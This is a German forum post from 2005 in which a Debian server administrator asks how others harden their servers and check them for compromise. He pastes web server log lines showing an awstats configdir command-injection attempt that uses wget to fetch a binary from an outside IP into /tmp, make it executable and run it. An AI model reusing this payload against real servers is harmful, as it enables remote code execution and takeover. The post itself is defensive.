Angriff auf server - alles dicht?
Hallo,
ich habe einen debian sarge server mit gepatchtem awstats 6.4, dass ich
durch .htacess vor unerlaubtem Zugriff schütze. Ich bekomme des öfteren
Meldungen wie diese, da war glaube ich auch mal ein linux-wurm dabei.
Es scheint mir aber trotz häufiger Versuch nie ein erfolgreichjer
Angriff dabei zu sein.
Daneben gibt es die üblichen ssh Angriffe, mitden blödsinnigsten
Benutzernamen. Root darf sich nicht anmelden, das läuft über sudo/su.
Wie habt ihr euren server abgesichert?
Ich benutze logcheck - filtern geht hier nicht, da es sich um einen
virtuellen server handelt, soll aber ja auch nicht sinnvoll sein, wenn
es sich bei dem Rechner nicht um eine explizite Firewall handelt.
Womit untersucht ihr, ob der server noch "clean" ist?
ciao
Gerhard
Hier mal so eine logcheck mail, mit 401 und 404 Fehlern, von dort gehen
dann ja wohl keine Gefahren aus (ist ziemlich regelmäßig, dass das
versucht wird, genauso wie die ssh Einlog-Versuche):
[...]
[ip.ip.ip.ip] - - [23/Dec/2005:00:07:15 +0100]
"GET /cgi-bin/awstats.pl?configdir=|
echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
HTTP/1.1" 401 479 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
[ip.ip.ip.ip] - - [23/Dec/2005:00:07:19 +0100]
"GET /cgi-bin/awstats/awstats.pl?configdir=|
echo;echo%20YYY;cd%20%2ftmp%3bwget%20209%2e136%2e48%2e69%2fmirela%3bchmod%20%2bx%20mirela%3b%2e%2fmirela;echo%20YYY;echo|
HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.1;)"
[Fri Dec 23 00:07:10 2005] [error] [client 62.4.80.149] File does not
exist: /var/www/blogs/xmlsrv/xmlrpc.php
[...]
[Fri Dec 23 00:07:19 2005] [error] [client 62.4.80.149] script not found
or unable to stat: /usr/lib/cgi-bin/awstats
[...]
Reply to: